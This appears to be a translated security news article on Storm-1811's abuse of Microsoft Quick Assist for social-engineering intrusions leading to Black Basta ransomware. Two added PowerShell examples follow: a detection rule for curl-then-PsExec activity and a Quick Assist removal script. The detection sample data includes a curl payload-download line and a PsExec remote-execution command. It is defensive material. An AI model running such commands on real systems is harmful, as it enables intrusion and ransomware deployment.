Quick Assist has become a ransomware weapon: Storm-1811 attacks the most gullible

Father

Targeting victims indiscriminately, the attackers rely on a proven method of getting onto the computer.

Microsoft Threat Intelligence has discovered a new campaign by the Storm-1811 group, which uses the Quick Assist tool to conduct social engineering attacks on users.

Quick Assist is a legitimate Microsoft application that allows the user to connect to another device via a remote connection to solve technical problems. The app is installed by default on Windows 11 devices.

The attacker uses Quick Assist to perform social engineering attacks, pretending to be a trusted contact in order to gain initial access to the victim's device. To make the attacks more convincing, the hacker uses the link listing technique: the victim's email address is signed up for numerous mailing lists so that spam floods the mailbox.

The cybercriminal then calls the victim, posing as a tech support employee and offering help with the spam problem, and asks to connect to the device via Quick Assist. Once the user allows access, the attacker runs the curl command to download and execute malicious files. The access obtained is used to enumerate domains and move laterally across the network, after which PsExec is used to distribute the Black Basta ransomware.
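The chain above leaves a recognisable footprint on the endpoint: a Quick Assist session, a curl.exe download, and then PsExec-style remote execution from the same host. The following correlation rule is an added example, not code from the original post or from Microsoft; it runs over a constructed set of process-creation records shaped like Sysmon Event ID 1 fields (the host names, paths, times and URLs are made up, and `quickassist.exe` as the process name is an assumption of this example).

```powershell
# Added example (not from the original post): flag a curl.exe download followed,
# within a time window, by PsExec execution on the same host, and note whether a
# Quick Assist process was seen on that host as supporting context.
# The event objects below are constructed sample data, not real telemetry.
$events = @(
    [pscustomobject]@{ Time='2024-05-13T10:02:11'; Host='WS-014'; Image='C:\Windows\System32\quickassist.exe'; CommandLine='quickassist.exe' }
    [pscustomobject]@{ Time='2024-05-13T10:09:40'; Host='WS-014'; Image='C:\Windows\System32\curl.exe'; CommandLine='curl.exe -o C:\Users\Public\update.zip https://example.invalid/update.zip' }
    [pscustomobject]@{ Time='2024-05-13T10:31:05'; Host='WS-014'; Image='C:\Tools\PsExec64.exe'; CommandLine='PsExec64.exe \\FS-02 -s cmd.exe /c C:\Users\Public\run.exe' }
    [pscustomobject]@{ Time='2024-05-13T11:00:00'; Host='WS-022'; Image='C:\Windows\System32\curl.exe'; CommandLine='curl.exe https://intranet.example.invalid/health' }
)

function Find-CurlThenPsExec {
    param([object[]]$Events, [int]$WindowMinutes = 60)
    $alerts = @()
    foreach ($group in $Events | Group-Object Host) {
        $sorted = $group.Group | Sort-Object { [datetime]$_.Time }

        # curl.exe writing a remote URL to disk (not just a health check)
        $downloads = $sorted | Where-Object {
            $_.Image -match '\\curl\.exe$' -and
            $_.CommandLine -match 'https?://' -and
            $_.CommandLine -match '(\s-o\s|\s-O\b|--output)'
        }
        # PsExec by image name or by its service/command-line markers
        $psexec = $sorted | Where-Object {
            $_.Image -match '\\psexec(64)?\.exe$' -or $_.CommandLine -match 'psexe(c|svc)'
        }
        # Quick Assist process name is an assumption; adjust to your telemetry
        $quickAssistSeen = [bool]($sorted | Where-Object { $_.Image -match '\\quickassist\.exe$' })

        foreach ($d in $downloads) {
            foreach ($p in $psexec) {
                $delta = ([datetime]$p.Time) - ([datetime]$d.Time)
                if ($delta.TotalMinutes -ge 0 -and $delta.TotalMinutes -le $WindowMinutes) {
                    $alerts += [pscustomobject]@{
                        Host           = $group.Name
                        QuickAssistSeen = $quickAssistSeen
                        Download       = $d.CommandLine
                        Lateral        = $p.CommandLine
                        MinutesBetween = [int]$delta.TotalMinutes
                    }
                }
            }
        }
    }
    return $alerts
}

# With the sample data, WS-014 produces one alert (QuickAssistSeen = True);
# WS-022's plain curl health check produces none.
Find-CurlThenPsExec -Events $events | Format-List
```

In production the `$events` array would be replaced by a query against your EDR or Sysmon data; the rule is intentionally narrow (download to disk, then PsExec on the same host) so that routine curl use, as on WS-022, does not fire.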

The campaign, which began in mid-April, targets a variety of industries, including manufacturing, construction, food processing, and transportation, demonstrating the opportunistic nature of the attacks.

Organizations are encouraged to block or remove Quick Assist and similar tools if they are not used, and train employees to recognize such scams.
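For the "block or remove" recommendation, the script below is an added example, not code from the original post or from Microsoft. It assumes an elevated PowerShell session and checks both places Quick Assist can live: as a Windows capability (Features on Demand, the form installed by default on Windows 10 and earlier Windows 11 builds) and as a Microsoft Store package on newer Windows 11 builds. The `-Remove` switch is this script's own parameter; the capability and package names are the ones Microsoft documents.

```powershell
# Added example (not from the original post): inventory Quick Assist on this
# machine and optionally remove it. Run elevated. Without -Remove the script
# only reports what it finds, so it can be used for an audit pass first.
param([switch]$Remove)

# 1. Quick Assist shipped as a Windows capability (Features on Demand)
$capabilities = Get-WindowsCapability -Online |
    Where-Object { $_.Name -like 'App.Support.QuickAssist*' }
foreach ($c in $capabilities) {
    if ($c.State -eq 'Installed') {
        Write-Output "Capability installed: $($c.Name)"
        if ($Remove) {
            Remove-WindowsCapability -Online -Name $c.Name | Out-Null
            Write-Output "Removed capability $($c.Name)"
        }
    }
}

# 2. Quick Assist as a Microsoft Store (Appx) package, for all users
$packages = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
foreach ($p in $packages) {
    Write-Output "Store package installed: $($p.PackageFullName)"
    if ($Remove) {
        Remove-AppxPackage -Package $p.PackageFullName -AllUsers
        Write-Output "Removed package $($p.PackageFullName)"
    }
}

if (-not $capabilities -and -not $packages) {
    Write-Output 'Quick Assist not found on this machine.'
}
```

Removal only addresses the bundled tool; the same phone-call pretext works with any remote-assistance or RMM software the caller can talk a user into installing, so the training point in the text matters as much as the uninstall.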

Storm-1811 is a financially motivated group known for using Black Basta ransomware. The attack scheme begins with a phone call, during which attackers, posing as Microsoft technical support or IT specialists of the victim's company, convince the victim to install tools for remote monitoring and management. QakBot, Cobalt Strike, and eventually Black Basta are then delivered to the device.
 